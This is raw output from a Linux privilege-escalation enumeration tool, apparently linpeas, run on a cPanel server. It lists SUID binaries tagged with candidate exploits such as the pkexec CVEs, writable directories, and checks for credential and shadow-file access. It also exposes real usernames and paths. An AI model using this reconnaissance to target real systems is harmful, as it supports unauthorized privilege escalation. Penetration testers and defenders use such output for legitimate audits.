LC_MEASUREMENT SendEnv LC_IDENTIFICATION LC_ALL LANGUAGE SendEnv XMODIFIERS  ╔════════════════════════════════════╗ ══════════════════════╣ Files with Interesting Permissions ╠══════════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β• ╔══════════╣ SUID - Check easy privesc, exploits and write perms β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid -rwsr-xr-x 1 root root 63K Mar 14 2019 /usr/bin/chage -rws--x--x 1 root root 24K Mar 14 2019 /usr/bin/chfn ---> SuSE_9.3/10 -rwsr-xr-x 1 root root 77K Mar 14 2019 /usr/bin/gpasswd -rwsr-xr-x 1 root root 41K Mar 14 2019 
/usr/bin/newgrp ---> HP-UX_10.20 -rwsr-xr-x 1 root root 44K Mar 14 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 -rwsr-x--- 1 root wheel 32K Mar 14 2019 /usr/bin/su -rwsr-xr-x 1 root root 32K Mar 14 2019 /usr/bin/umount ---> BSD/Linux(08-1996) -rwsr-xr-x 1 root root 84K Apr 11 2018 /usr/bin/quota ---s--x--- 1 root stapusr 204K Nov 1 2018 /usr/bin/staprun -rwsr-xr-x. 1 root root 28K Jun 10 2014 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) -rwsr-xr-x 1 root root 52K Oct 30 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwsr-xr-x 1 root root 57K Nov 20 2018 /usr/bin/crontab -rwsr-xr-x 1 root root 24K Mar 8 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)/Generic_CVE-2021-4034 ---s--x--x 1 root root 144K Oct 31 2018 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable -rwsr-xr-x 1 root root 11K Apr 11 2018 /usr/sbin/pam_timestamp_check -rwsr-xr-x 1 root root 36K Apr 11 2018 /usr/sbin/unix_chkpwd -rwsr-xr-x 1 root root 12K Oct 31 2018 /usr/sbin/usernetctl -rwsr-xr-x 1 root nobody 20K Jul 2 2019 /usr/sbin/suexec -rwsr-x--- 1 root nobody 2.5M Jul 24 2019 /usr/sbin/suphp (Unknown SUID binary!) -rwsr-xr-x 1 root root 1.5M Mar 21 22:44 /usr/sbin/exim (Unknown SUID binary!) -rwsr-xr-x 1 root root 115K Oct 14 2021 /usr/sbin/mount.nfs -rwsr-xr-x 1 root root 16K Mar 8 2019 /usr/lib/polkit-1/polkit-agent-helper-1 -rwsr-sr-x 1 abrt abrt 16K Nov 13 2018 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache ---> CENTOS -rwsr-x--- 1 root dbus 57K Mar 14 2019 /usr/libexec/dbus-1/dbus-daemon-launch-helper -r-sr-xr-x 1 root root 197K Aug 3 2015 /usr/local/nagios/libexec/check_dhcp (Unknown SUID binary!) -r-sr-xr-x 1 root root 209K Aug 3 2015 /usr/local/nagios/libexec/check_icmp (Unknown SUID binary!) -rwsr-xr-x. 1 root root 10K Aug 23 2014 /vmware-tools-distrib/lib/bin64/vmware-user-suid-wrapper -rwsr-xr-x. 
1 root root 9.4K Aug 23 2014 /vmware-tools-distrib/lib/bin32/vmware-user-suid-wrapper ╔══════════╣ SGID β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid -r-xr-sr-x. 1 root tty 15K Jun 10 2014 /usr/bin/wall -rwxr-sr-x 1 root tty 20K Mar 14 2019 /usr/bin/write ---x--s--x 1 root nobody 374K Apr 11 2018 /usr/bin/ssh-agent -rwx--s--x 1 root slocate 40K Apr 11 2018 /usr/bin/locate -rwxr-sr-x 1 root screen 465K Apr 11 2018 /usr/bin/screen ---> GNU_Screen_4.5.0 -rwxr-sr-x 1 root root 7.1K Oct 31 2018 /usr/sbin/netreport -rwxr-sr-x 1 root mailtrap 14K Mar 21 22:44 /usr/sbin/sendmail ---> Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_(SGI_ProPack_1.2/1.3) ---x--s--x 1 root ssh_keys 459K Apr 11 2018 /usr/libexec/openssh/ssh-keysign -rwsr-sr-x 1 abrt abrt 16K Nov 13 2018 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache ---> CENTOS ╔══════════╣ Files with ACLs (limited to 50) β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls files with acls in searched folders Not Found  ╔══════════╣ Capabilities β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities ══╣ Current shell capabilities CapInh: 0x0000000000000000= CapPrm: 0x0000000000000000= CapEff: 0x0000000000000000= CapBnd: 0x0000001fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,35,36 CapAmb: 0x0000000000000000= β•š Parent process capabilities CapInh: 0x0000000000000000= CapPrm: 0x0000000000000000= CapEff: 0x0000000000000000= 
CapBnd: 0x0000001fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,35,36 CapAmb: 0x0000000000000000= Files with capabilities (limited to 50): /usr/bin/ping = cap_net_admin,cap_net_raw+p /usr/sbin/suexec = cap_setgid,cap_setuid+ep /usr/sbin/arping = cap_net_raw+p /usr/sbin/clockdiff = cap_net_raw+p /usr/sbin/mtr = cap_net_raw+ep ╔══════════╣ Checking misconfigurations of ld.so β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#ldso /etc/ld.so.conf Content of /etc/ld.so.conf: include ld.so.conf.d/*.conf ld.so.conf.d  ld.so.conf.d/* cat: ld.so.conf.d/*: No such file or directory /etc/ld.so.preload ╔══════════╣ Files (scripts) in /etc/profile.d/ β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#profiles-files total 120 drwxr-xr-x. 2 root root 4096 Dec 8 2023 . drwxr-xr-x. 121 root root 12288 May 23 17:20 .. -rw-r--r-- 1 root root 771 Oct 31 2018 256term.csh -rw-r--r-- 1 root root 841 Oct 31 2018 256term.sh -rw-r--r-- 1 root root 1348 Nov 13 2018 abrt-console-notification.sh -rw-r--r--. 
1 root root 660 Jun 10 2014 bash_completion.sh -rw-r--r-- 1 root root 69 Aug 7 2017 bash_timestamps.sh -rw-r--r-- 1 root root 196 Mar 24 2017 colorgrep.csh -rw-r--r-- 1 root root 201 Mar 24 2017 colorgrep.sh -rw-r--r-- 1 root root 1741 Oct 30 2018 colorls.csh -rw-r--r-- 1 root root 1606 Oct 30 2018 colorls.sh -rwxr-xr-x 1 root root 548 Nov 3 2023 cpanel-php-composer.sh -rw-r--r-- 1 root root 358 Nov 2 2017 cpanel-user-commands.sh -rw-r--r-- 1 root root 80 Oct 31 2018 csh.local -rw-r--r-- 1 root root 1706 Oct 31 2018 lang.csh -rw-r--r-- 1 root root 2703 Oct 31 2018 lang.sh -rw-r--r-- 1 root root 123 Jul 31 2015 less.csh -rw-r--r-- 1 root root 121 Jul 31 2015 less.sh -rwxr-xr-x 1 root root 240 Aug 7 2017 locallib.csh -rwxr-xr-x 1 root root 272 Aug 7 2017 locallib.sh -rwxr-xr-x 1 root root 37 Feb 7 2017 os-security.sh -rw------- 1 root root 48 Jul 3 2019 python3.7.sh -rw-r--r-- 1 root root 81 Oct 31 2018 sh.local -rw-r--r-- 1 root root 105 Jun 28 2019 vim.csh -rw-r--r-- 1 root root 269 Jun 28 2019 vim.sh -rw-r--r--. 1 root root 164 Jan 28 2014 which2.csh -rw-r--r--. 1 root root 169 Jan 28 2014 which2.sh ╔══════════╣ Permissions in init, init.d, systemd, and rc.d ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd  ═╣ Hashes inside passwd file? ........... No ═╣ Writable passwd file? ................ No ═╣ Credentials in fstab/mtab? ........... No ═╣ Can I read shadow files? ............. No ═╣ Can I read shadow plists? ............ No ═╣ Can I write shadow plists? ........... No ═╣ Can I read opasswd file? ............. No ═╣ Can I write in network-scripts? ...... No ═╣ Can I read root folder? .............. 
No  ╔══════════╣ Searching root files in home dirs (limit 30) /home/ /root/ /var/www /var/www/cgi-bin /var/www/html /var/www/html/400.shtml /var/www/html/401.shtml /var/www/html/403.shtml /var/www/html/404.shtml /var/www/html/413.shtml /var/www/html/500.shtml /var/www/html/cp_errordocument.shtml /var/www/html/index.html /var/www/html/suspended.page /var/www/html/suspended.page/index.html /var/www/html/.well-known /var/www/html/.well-known/pki-validation /var/www/html/.well-known/pki-validation/51065C27A8C3FFD02217F83282EDE214.txt /var/www/html/.well-known/pki-validation/C5352B49F0027A4DEB6833D1F0AB9ECD.txt /var/www/html/.well-known/pki-validation/7F6BF68B9A61E06F127FA47C420F1AA3.txt /var/www/html/.well-known/pki-validation/0ACB14A369FB93863EC208B4914172AE.txt /var/www/html/.well-known/pki-validation/CD992C90A70B106A4C6C975109E26F24.txt /var/www/html/.well-known/pki-validation/F29E747DFD32220E94A41984A748B761.txt /var/www/html/.well-known/pki-validation/C36C8DD907A2A7AFB3C8F096217C19A0.txt /var/www/html/.well-known/pki-validation/E876F34D0778207D7ADD8F6EB19A5B97.txt /var/www/html/.well-known/pki-validation/B9E182CD5085D4C47EEC9E1F38DCB3B3.txt /var/www/html/.well-known/pki-validation/B5DE5306FAF688A71485F739351EDE6B.txt /var/www/html/.well-known/pki-validation/12E068CE2D3EEE3ACC7BDF72FC162710.txt /var/www/html/.well-known/pki-validation/6170AE956D4159C0147B629B1CC9B353.txt /var/www/html/.well-known/pki-validation/ED96C27C4EA6B337D1A28876AB5352D5.txt ╔══════════╣ Searching folders owned by me containing others files on it (limit 100) -rw------- 1 root root 0 Dec 3 2017 /opt/cpanel/ea-php55/root/usr/var/log/php-fpm/error.log -rw------- 1 root root 0 Dec 3 2017 /opt/cpanel/ea-php56/root/usr/var/log/php-fpm/error.log -rw------- 1 root root 0 Dec 3 2017 /opt/cpanel/ea-php70/root/usr/var/log/php-fpm/error.log -rw------- 1 root root 233 Nov 1 2017 /opt/cpanel/ea-php55/root/usr/var/log/php-fpm/error.log-20171102 -rw------- 1 root root 233 Nov 1 2017 
/opt/cpanel/ea-php56/root/usr/var/log/php-fpm/error.log-20171102 -rw------- 1 root root 233 Nov 1 2017 /opt/cpanel/ea-php70/root/usr/var/log/php-fpm/error.log-20171102 -rw------- 1 root root 233 Nov 8 2017 /opt/cpanel/ea-php55/root/usr/var/log/php-fpm/error.log-20171109 -rw------- 1 root root 233 Nov 8 2017 /opt/cpanel/ea-php56/root/usr/var/log/php-fpm/error.log-20171109 -rw------- 1 root root 233 Nov 8 2017 /opt/cpanel/ea-php70/root/usr/var/log/php-fpm/error.log-20171109 -rw------- 1 root root 233 Nov 25 2017 /opt/cpanel/ea-php55/root/usr/var/log/php-fpm/error.log-20171126 -rw------- 1 root root 233 Nov 25 2017 /opt/cpanel/ea-php56/root/usr/var/log/php-fpm/error.log-20171126 -rw------- 1 root root 233 Nov 25 2017 /opt/cpanel/ea-php70/root/usr/var/log/php-fpm/error.log-20171126 -rw------- 1 root root 233 Nov 30 2017 /opt/cpanel/ea-php55/root/usr/var/log/php-fpm/error.log-20171203 -rw------- 1 root root 233 Nov 30 2017 /opt/cpanel/ea-php56/root/usr/var/log/php-fpm/error.log-20171203 -rw------- 1 root root 233 Nov 30 2017 /opt/cpanel/ea-php70/root/usr/var/log/php-fpm/error.log-20171203 ╔══════════╣ Readable files belonging to root and readable by me but not world readable -rwsr-x--- 1 root nobody 2602491 Jul 24 2019 /usr/sbin/suphp ╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200) ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files /dev/mqueue /dev/shm /opt/cpanel/ea-php55/root/usr/var/log/php-fpm /opt/cpanel/ea-php56/root/usr/var/log/php-fpm /opt/cpanel/ea-php70/root/usr/var/log/php-fpm /run/faillock/nobody /tmp /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix /tmp/.font-unix #)You_can_write_even_more_files_inside_last_directory  /tmp/yum-nobody-GKUGT1/x86_64 /tmp/yum-nobody-GKUGT1/x86_64/7 /tmp/yum-nobody-GKUGT1/x86_64/7/EA4 /tmp/yum-nobody-GKUGT1/x86_64/7/EA4/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/EA4/gen 
/tmp/yum-nobody-GKUGT1/x86_64/7/EA4/mirrorlist.txt /tmp/yum-nobody-GKUGT1/x86_64/7/EA4/packages /tmp/yum-nobody-GKUGT1/x86_64/7/EA4/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/base /tmp/yum-nobody-GKUGT1/x86_64/7/base/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/base/gen /tmp/yum-nobody-GKUGT1/x86_64/7/base/packages /tmp/yum-nobody-GKUGT1/x86_64/7/base/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed /tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/gen /tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/mirrorlist.txt /tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/packages /tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/epel /tmp/yum-nobody-GKUGT1/x86_64/7/epel/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/epel/gen /tmp/yum-nobody-GKUGT1/x86_64/7/epel/metalink.xml /tmp/yum-nobody-GKUGT1/x86_64/7/epel/packages /tmp/yum-nobody-GKUGT1/x86_64/7/epel/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/extras /tmp/yum-nobody-GKUGT1/x86_64/7/extras/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/extras/gen /tmp/yum-nobody-GKUGT1/x86_64/7/extras/packages /tmp/yum-nobody-GKUGT1/x86_64/7/extras/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/imunify360 /tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/gen /tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/packages /tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client /tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/gen /tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/packages /tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/updates /tmp/yum-nobody-GKUGT1/x86_64/7/updates/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/updates/gen 
/tmp/yum-nobody-GKUGT1/x86_64/7/updates/packages /tmp/yum-nobody-GKUGT1/x86_64/7/updates/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/gen /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/packages /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/gen /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/packages /tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/gen /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/packages /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/repomd.xml /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/cachecookie /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/gen /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/packages /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/repomd.xml /var/cache/apache2 /var/cache/apache2/proxy /var/tmp /var/tmp/.ICE-unix /var/tmp/.Test-unix /var/tmp/.X11-unix /var/tmp/.XIM-unix /var/tmp/.font-unix #)You_can_write_even_more_files_inside_last_directory  /var/tmp/yum-nobody-GKUGT1/x86_64 /var/tmp/yum-nobody-GKUGT1/x86_64/7 /var/tmp/yum-nobody-GKUGT1/x86_64/7/EA4 /var/tmp/yum-nobody-GKUGT1/x86_64/7/EA4/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/EA4/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/EA4/mirrorlist.txt /var/tmp/yum-nobody-GKUGT1/x86_64/7/EA4/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/EA4/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/base /var/tmp/yum-nobody-GKUGT1/x86_64/7/base/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/base/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/base/packages 
/var/tmp/yum-nobody-GKUGT1/x86_64/7/base/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed /var/tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/mirrorlist.txt /var/tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/cpanel-addons-production-feed/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/epel /var/tmp/yum-nobody-GKUGT1/x86_64/7/epel/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/epel/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/epel/metalink.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/epel/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/epel/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/extras /var/tmp/yum-nobody-GKUGT1/x86_64/7/extras/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/extras/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/extras/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/extras/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/imunify360 /var/tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/imunify360/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client /var/tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/spacewalk-client/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/updates /var/tmp/yum-nobody-GKUGT1/x86_64/7/updates/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/updates/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/updates/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/updates/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/cachecookie 
/var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-cpanel/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/wp-toolkit-thirdparties/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix-non-supported/repomd.xml /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/cachecookie /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/gen /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/packages /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix/repomd.xml ╔══════════╣ Interesting GROUP writable files (not in Home) (max 200) ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files   ╔═════════════════════════╗ ════════════════════════════╣ Other Interesting Files ╠════════════════════════════  ╚═════════════════════════╝ ╔══════════╣ .sh files in path ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path /usr/sbin/pm-utils-bugreport-info.sh /usr/bin/lesspipe.sh /usr/bin/gettext.sh /usr/bin/setup-nsssysinit.sh /usr/bin/unix-lpr.sh /usr/bin/lprsetup.sh /usr/bin/isc-config.sh ╔══════════╣ Executable files potentially added by user (limit 70) 2025-05-01+22:26:45.6295003220 /etc/systemd/system/ror 2019-08-07+08:56:54.9687279700 /usr/bin/virtualenv 2019-08-06+15:22:08.1389506180 /usr/bin/tensorboard 
2019-08-06+15:21:54.7119508490 /usr/bin/saved_model_cli 2019-08-06+15:21:54.7109508490 /usr/bin/tf_upgrade_v2 2019-08-06+15:21:54.7109508490 /usr/bin/freeze_graph 2019-08-06+15:21:54.7099508490 /usr/bin/toco_from_protos 2019-08-06+15:21:54.7089508490 /usr/bin/toco 2019-08-06+15:21:54.7089508490 /usr/bin/tflite_convert 2019-08-06+15:19:08.4399537090 /usr/bin/jupyter-qtconsole 2019-08-06+15:17:56.0509549540 /usr/bin/pygmentize 2019-08-06+15:16:54.6699560100 /usr/bin/pbr 2019-08-06+15:16:40.3649562560 /usr/bin/f2py2.7 2019-08-06+15:16:40.3639562560 /usr/bin/f2py2 2019-08-06+15:16:40.3639562560 /usr/bin/f2py 2019-08-06+15:16:24.4049565310 /usr/bin/jupyter-serverextension 2019-08-06+15:16:24.4049565310 /usr/bin/jupyter-notebook 2019-08-06+15:16:24.4049565310 /usr/bin/jupyter-bundlerextension 2019-08-06+15:16:24.4039565310 /usr/bin/jupyter-nbextension 2019-08-06+15:16:03.1399568960 /usr/bin/jupyter-nbconvert 2019-08-06+15:15:16.5939576970 /usr/bin/markdown_py 2019-08-06+15:14:52.0189581200 /usr/bin/jupyter-troubleshoot 2019-08-06+15:14:52.0189581200 /usr/bin/jupyter-migrate 2019-08-06+15:14:52.0179581200 /usr/bin/jupyter 2019-08-06+15:14:45.1199582390 /usr/bin/jupyter-kernel 2019-08-06+15:14:45.1189582390 /usr/bin/jupyter-run 2019-08-06+15:14:45.1189582390 /usr/bin/jupyter-kernelspec 2019-08-06+15:14:39.6479583330 /usr/bin/jsonschema 2019-08-06+15:14:13.3299587850 /usr/bin/ipython2 2019-08-06+15:14:13.3299587850 /usr/bin/iptest 2019-08-06+15:14:13.3289587860 /usr/bin/iptest2 2019-08-06+15:14:13.3279587860 /usr/bin/ipython 2019-02-07+22:27:17.2111039410 /etc/rc.d/init.d/filelimits 2018-01-25+12:36:33.5400956950 /usr/bin/chardetect 2018-01-25+11:40:24.7853207790 /usr/bin/jupyter-console 2018-01-25+11:40:22.4244016450 /usr/bin/easy_install-2.7 2018-01-25+11:40:22.4244016450 /usr/bin/easy_install 2018-01-25+11:40:19.7994915530 /usr/bin/jupyter-trust 2018-01-20+12:53:36.9885552330 /usr/bin/wheel 2017-08-07+19:31:49.6558178500 /etc/profile.d/locallib.csh 
2017-08-07+19:31:49.6537462880 /etc/profile.d/locallib.sh 2017-08-07+19:27:44.7829213770 /usr/bin/pyzor-migrate 2017-08-07+19:27:44.7819213670 /usr/bin/pyzor 2017-08-07+19:27:44.7789213370 /usr/bin/pyzord 2017-02-27+12:17:27.3103618960 /etc/cron.hourly/iops 2017-02-27+12:14:59.4523707090 /usr/local/nagios/libexec/check_mem 2017-02-07+13:04:03.6448554870 /etc/profile.d/os-security.sh 2017-02-03+10:48:55.3929140230 /etc/cron.daily/tmpwatch 2015-08-03+10:19:27.7951975170 /usr/local/nagios/libexec/check_tps 2015-08-03+10:19:27.7941975170 /usr/local/nagios/libexec/check_srvstate 2015-08-03+10:19:27.7931975170 /usr/local/nagios/libexec/check_load 2015-08-03+10:19:27.7921975170 /usr/local/nagios/libexec/check_disk 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/nagisk.pl 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/custom_check_procs 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/custom_check_mem 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_yum 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_sip 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_services 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_open_files.pl 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_netstat.pl 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_init_service 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_cpu_stats.sh 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_asterisk_sip_peers.sh 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_asterisk.pl 2015-08-03+10:14:30.2072184660 /usr/local/nagios/libexec/send_nsca 2015-08-03+10:14:30.2062184660 /usr/local/nagios/bin/nsca 2015-08-03+10:14:25.8042187760 /usr/local/nagios/bin/nrpe 2015-08-03+10:14:25.7992187760 /usr/local/nagios/libexec/check_nrpe 2015-08-03+10:14:21.0202191120 /usr/local/nagios/libexec/check_icmp 2015-08-03+10:14:21.0182191130 /usr/local/nagios/libexec/check_dhcp 
╔══════════╣ Unexpected in /opt (usually empty) total 725016 -rw-rw---- 1 mysql mysql 449816376 Feb 22 2019 #sql_33a_0.MYD -rw-rw---- 1 mysql mysql 283947008 Feb 22 2019 #sql_33a_1.MYD drwxr-xr-x. 6 root root 4096 Oct 5 2024 . dr-xr-xr-x. 19 root root 4096 May 23 17:00 .. drwxr-xr-x 7 ctrlsadmin nagios 4096 Nov 25 2017 Archive-Zip-1.30 -rw------- 1 root root 197179 Jun 30 2009 Archive-Zip-1.30.tar.gz -rw-r--r-- 1 root root 8252398 Nov 12 2020 CitrixHypervisor-LinuxGuestTools-7.20.0-1.tar.gz drwxr-xr-x 4 chrony mysyslog 4096 May 19 2020 LinuxGuestTools-7.20.0-1 -rw------- 1 root root 156613 Sep 6 2014 atop-2.1-1.x86_64.rpm -rw-r--r-- 1 miisky miisky 13 Jul 4 2024 backup-7.4.2024_17-59-16_miisky -rw-r--r-- 1 miisky miisky 13 Jul 4 2024 backup-7.4.2024_17-59-16_miisky.tar.gz drwxr-xr-x 13 root root 4096 Sep 5 2018 cpanel -rw------- 1 root root 189 Feb 27 2017 ifcfg-ens192 -rw-r--r-- 1 root root 187 Aug 7 2017 